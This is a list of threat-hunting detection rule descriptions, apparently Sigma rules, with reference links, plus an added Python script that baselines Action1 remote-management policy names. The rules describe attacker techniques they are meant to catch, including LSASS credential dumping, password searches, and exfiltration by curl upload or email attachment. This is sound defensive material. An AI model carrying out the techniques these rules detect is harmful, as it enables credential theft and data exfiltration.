Potential Registry Reconnaissance Via PowerShell Script Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md
Use Of Remove-Item to Delete File - ScriptBlock Detects PowerShell Remove-Item with -Path used to delete a file or a folder with "-Recurse". https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7
Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4, https://www.ietf.org/rfc/rfc2821.txt
WinAPI Library Calls Via PowerShell Scripts Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
WinAPI Function Calls Via PowerShell Scripts Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Potential Credential Dumping Attempt Via PowerShell Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
LSASS Access From Program In Potentially Suspicious Folder Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder. https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Uncommon GrantedAccess Flags On LSASS Detects process access to LSASS memory with the uncommon access flags 0x410 and 0x01410. https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Potential Shellcode Injection Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject. https://github.com/EmpireProject/PSInject
Password Protected Compressed File Extraction Via 7Zip Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/
Set Files as System Files Using Attrib.EXE Detects the execution of "attrib" with the "+s" flag to mark files as system files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/
Potential BOINC Software Execution (UC-Berkeley Signature) Detects the use of software that is related to the University of California, Berkeley via metadata information. This indicates it may be related to BOINC software and can be used maliciously if unauthorized. https://boinc.berkeley.edu/, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
CMD Shell Output Redirect Detects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. https://ss64.com/nt/syntax-redirection.html
Potential File Override/Append Via SET Command Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. Attackers have used this technique together with the append redirection operator ">>" in order to update the content of a file indirectly. Ex: cmd /c >> example.txt set /p="test data". This appends "test data" to the contents of "example.txt". The typical use case of "set /p=" is to prompt the user for input. https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1, https://ss64.com/nt/set.html
Headless Process Launched Via Conhost.EXE Detects the launch of a child process via "conhost.exe" with the "--headless" flag. The "--headless" flag hides the windows from the user upon execution. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Dynamic .NET Compilation Via Csc.EXE - Hunting Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897
File Download Via Curl.EXE Detects file download using curl.exe https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
Curl.EXE Execution Detects a curl process start on Windows, which could indicate a file download from a remote location or a simple web request to a remote server https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
Potential Data Exfiltration Via Curl.EXE Detects the execution of the "curl" process with upload flags, which might indicate potential data exfiltration https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html
Diskshadow Child Process Spawned Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
Curl.EXE Execution With Custom UserAgent Detects execution of curl.exe with custom useragent options https://curl.se/docs/manpage.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd
ClickOnce Deployment Execution - Dfsvc.EXE Child Process Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Diskshadow Script Mode Execution Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the system. Investigate the content of the scripts and their location. https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
Potential Proxy Execution Via Explorer.EXE From Shell Process Detects the creation of a child "explorer.exe" process from a shell-like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" to evade defense mechanisms by proxying the execution through it. While this is often a legitimate action, this rule can be used to hunt for anomalies. The MuddyWater threat actor was seen using this technique. https://twitter.com/CyberRaiju/status/1273597319322058752, https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/
Potential DLL Sideloading Activity Via ExtExport.EXE Detects the execution of "Extexport.exe", a utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to sideload any DLL. If a folder is provided on the command line it will load any DLL with one of the following names: "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags were provided. https://lolbas-project.github.io/lolbas/Binaries/Extexport/, https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/, https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/, https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/
Potential Password Reconnaissance Via Findstr.EXE Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages https://steflan-security.com/windows-privilege-escalation-credential-harvesting/, https://adsecurity.org/?p=2288
New Self Extracting Package Created Via IExpress.EXE Detects the "iexpress.exe" utility creating self-extracting packages. Attackers were seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and, in case of a ".sed" file, check its contents and legitimacy. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Microsoft Workflow Compiler Execution Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/
CodePage Modification Via MODE.COM Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware. https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
Net.EXE Execution Detects execution of "Net.EXE". https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html, https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html, https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe
SMB over QUIC Via Net.EXE Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
Suspicious New Instance Of An Office COM Object Detects an svchost process spawning an instance of an Office application. This happens when the initial Word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. This can be used by malicious actors to create malicious Office documents with macros on the fly. (See the vba2clr project in the references) https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic, https://github.com/med0x2e/vba2clr
Import New Module Via PowerShell CommandLine Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1
Unusually Long PowerShell CommandLine Detects unusually long PowerShell command lines with a length of 1000 characters or more https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. The .NET namespace "System.Security.Cryptography", reachable from PowerShell, provides classes for on-the-fly encryption and decryption. These can be used, for example, to decrypt a malicious payload for defense evasion. https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html, https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
Potentially Suspicious PowerShell Child Processes Detects potentially suspicious child processes spawned by PowerShell. Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. https://twitter.com/ankit_anubhav/status/1518835408502620162
Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver, https://ss64.com/nt/regsvr32.html
Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions Detects the execution of Action1 in order to execute arbitrary code or establish a remote session. Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries. Through the web interface of Action1, the administrator must create a new policy or an app to establish remote execution and then point it at the endpoints where the agent is installed. Hunting Opportunity 1 - Weed Out The Noise: When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during execution. Below is an example of the command line that contains the deployment of a binary through a policy with the name "test_app_1": ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0" After establishing a baseline, we can split the command line to extract the policy name, group all the policy names and inspect the results as a list of frequency occurrences. Hunting Opportunity 2 - Remote Sessions Out Of Office Hours: If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and filter on the time of the initiated sessions, looking for abnormal activity. https://twitter.com/Kostastsale/status/1646256901506605063?s=20, https://www.action1.com/documentation/
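The two hunting opportunities above are easy to describe and fiddly to get right, because the policy name has to be carved out of a token that also carries a type prefix and a timestamp. The Python below is an added example (not Action1's tooling and not part of the Sigma rule set) that extracts the policy name, builds the frequency list, reports names absent from a baseline, and checks whether the embedded timestamp falls outside working hours. The token layout schedule:<Kind>__<policy>_<13-digit epoch milliseconds> is an assumption inferred from the single command line quoted in the rule; the "Run_Script" kind, the extra policy names, the baseline and the 08:00 to 18:00 UTC window are constructed and must be tuned to the environment.

```python
"""Extract Action1 policy names from agent command lines, baseline them and
flag out-of-hours activity.  Added example, not Action1's own tooling and not
part of the Sigma rule set.  Assumption: the token layout
    schedule:<Kind>__<policy name>_<13-digit epoch milliseconds>
is inferred from the one command line quoted in the rule."""
import re
from collections import Counter
from datetime import datetime, timezone

SCHEDULE_RE = re.compile(r"schedule:(?P<kind>.+?)__(?P<policy>.+?)_(?P<ts>\d{13})\b")


def parse_schedule_token(command_line):
    """Return {'kind', 'policy', 'ts_ms'} or None when no schedule: token is present."""
    m = SCHEDULE_RE.search(command_line)
    if not m:
        return None
    return {"kind": m["kind"], "policy": m["policy"], "ts_ms": int(m["ts"])}


def policy_frequencies(command_lines):
    """Hunting opportunity 1: how often each policy/app name appears in the telemetry."""
    counts = Counter()
    for line in command_lines:
        parsed = parse_schedule_token(line)
        if parsed:
            counts[parsed["policy"]] += 1
    return counts


def new_policies(counts, baseline):
    """Policy names not present in the established baseline, sorted for review."""
    return sorted(name for name in counts if name not in baseline)


def is_out_of_hours(ts_ms, start_hour=8, end_hour=18, tz=timezone.utc):
    """Hunting opportunity 2: True when the activity falls outside the assumed
    working window [start_hour, end_hour) in the given timezone.  Both the
    window and the timezone are assumptions to tune per organisation."""
    hour = datetime.fromtimestamp(ts_ms / 1000, tz).hour
    return not (start_hour <= hour < end_hour)


# Constructed ParentCommandLine values.  The first is the one quoted in the
# rule; the others (and the "Run_Script" kind) are made up for the example.
SAMPLE_COMMAND_LINES = [
    r'"C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"',
    r'"C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__patch_tuesday_1681300000000 runaction:0"',
    r'"C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__patch_tuesday_1681300060000 runaction:0"',
    r'"C:\WINDOWS\Action1\action1_agent.exe schedule:Run_Script__inventory_1681300120000 runaction:0"',
    r'"C:\WINDOWS\Action1\action1_agent.exe runaction:0"',
]

# Assumed baseline of policy names an admin team has confirmed as their own.
BASELINE = {"patch_tuesday", "inventory"}

if __name__ == "__main__":
    counts = policy_frequencies(SAMPLE_COMMAND_LINES)
    for name, n in counts.most_common():
        print("%-15s %d" % (name, n))
    print("new to baseline:", new_policies(counts, BASELINE))
    for line in SAMPLE_COMMAND_LINES:
        parsed = parse_schedule_token(line)
        if parsed and is_out_of_hours(parsed["ts_ms"]):
            print("out of hours:", parsed["policy"],
                  datetime.fromtimestamp(parsed["ts_ms"] / 1000, timezone.utc))
```

The frequency list is the first pass: a name seen once, outside the baseline, and stamped at 19:27 UTC (as the quoted test_app_1 deployment is) deserves a look before the hundreds of patch_tuesday runs do. The regex anchors on the 13-digit millisecond suffix rather than on the policy name, so policy names that themselves contain underscores are kept whole.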
Remote Access Tool - Ammy Admin Agent Execution Detects the execution of the Ammy Admin RMM agent for remote management. https://www.ammyy.com/en/admin_features.html
Remote Access Tool - Cmd.EXE Execution via AnyViewer Detects execution of "cmd.exe" via the AnyViewer RMM agent during a remote management session. https://www.anyviewer.com/help/remote-technical-support.html
Remote Access Tool - ScreenConnect Remote Command Execution - Hunting Detects remote binary or command execution via the ScreenConnect Service. Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
DLL Call by Ordinal Via Rundll32.EXE Detects calls of DLL exports by ordinal number via rundll32.exe. https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/, https://github.com/Neo23x0/DLLRunner, https://twitter.com/cyb3rops/status/1186631731543236608, https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver
Scheduled Task Creation From Potential Suspicious Parent Location Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
SC.EXE Query Execution Detects execution of "sc.exe" to query information about registered services on the system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery
Potential CommandLine Obfuscation Using Unicode Characters Detects potential CommandLine obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http
Potentially Suspicious Compression Tool Parameters Detects potentially suspicious command line arguments of common data compression tools https://twitter.com/SBousseaden/status/1184067445612535811
Elevated System Shell Spawned Detects when a shell program such as the Windows command prompt or PowerShell is launched with SYSTEM privileges. Use this rule to hunt for potentially suspicious processes. https://github.com/Wh04m1001/SysmonEoP
EventLog Query Requests By Builtin Utilities Detects attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
Potential Suspicious Execution From GUID Like Folder Names Detects potentially suspicious execution from a GUID-like folder name located in a suspicious location such as %TEMP%, as seen in IcedID attacks. Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. https://twitter.com/Kostastsale/status/1565257924204986369
Execution From Webserver Root Folder Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors Internal Research
Tunneling Tool Execution Detects the execution of well known tools that can be abused for data exfiltration and tunneling. https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
File or Folder Permissions Modifications Detects a file or folder's permissions being modified or tampered with. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11), https://github.com/swagkarna/Defeat-Defender-V1.2.0
Manual Execution of Script Inside of a Compressed File This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as the wscript and cscript binaries. In the query below, the child process is the script interpreter that will execute the script. The script extension is one of the standard extensions that the Windows OS recognizes. Selections 1-3 contain three different execution scenarios. 1. Compressed file opened using 7zip. 2. Compressed file opened using WinRar. 3. Compressed file opened using native Windows File Explorer capabilities. When the malicious script is double-clicked, it is extracted to the respective directory as signified by the CommandLine in each of the three Selections. It is then executed using the relevant script interpreter. https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a, https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692
Process Terminated Via Taskkill Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process, https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
Suspicious Tasklist Discovery Command Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist
System Information Discovery Via Wmic.EXE Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions. https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/
Arbitrary Command Execution Using WSL Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642
Cab File Extraction Via Wusa.EXE Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract a CAB file using the "/extract" argument, which is no longer supported. https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
Scheduled Task Created - Registry Detects the creation of a scheduled task via Registry keys. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5
Microsoft Office Trusted Location Updated Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01
Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace Detects the setting of a registry value inside "\Shell\Open\Command" with PowerShell classes from the "System.Security.Cryptography" namespace. The .NET namespace "System.Security.Cryptography", reachable from PowerShell, provides classes for on-the-fly encryption and decryption. These can be used, for example, to decrypt a malicious payload for defense evasion. https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/
Command Executed Via Run Dialog Box - Registry Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. https://www.forensafe.com/blogs/runmrukey.html, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
Service Binary in User Controlled Folder Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". Attackers often use such directories for staging purposes. This rule might also trigger on badly written software, where, if an attacker controls an auto-starting service, they might achieve persistence or privilege escalation. Note that while ProgramData is a user controlled folder, software might apply strict ACLs which make its subfolders accessible only to admin users. Remove such folders via filters if you experience a lot of noise. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Shell Context Menu Command Tampering Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. https://mrd0x.com/sentinelone-persistence-via-menu-context/
AWS EC2 Download Userdata Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py
Potential Backup Enumeration on AWS Detects potential enumeration activity targeting an AWS instance backups https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Account Enumeration on AWS Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. None
Potential Network Enumeration on AWS Detects network enumeration performed on AWS. https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Potential Storage Enumeration on AWS Detects potential enumeration activity targeting AWS storage https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
AWS Lambda Function Created or Invoked Detects when a user creates or invokes a Lambda function. https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
AWS Macie Evasion Detects attempts to evade detection by Amazon Macie. https://docs.aws.amazon.com/cli/latest/reference/macie/
Potential AWS Cloud Email Service Abuse Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
Sign-in Failure Bad Password Threshold Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
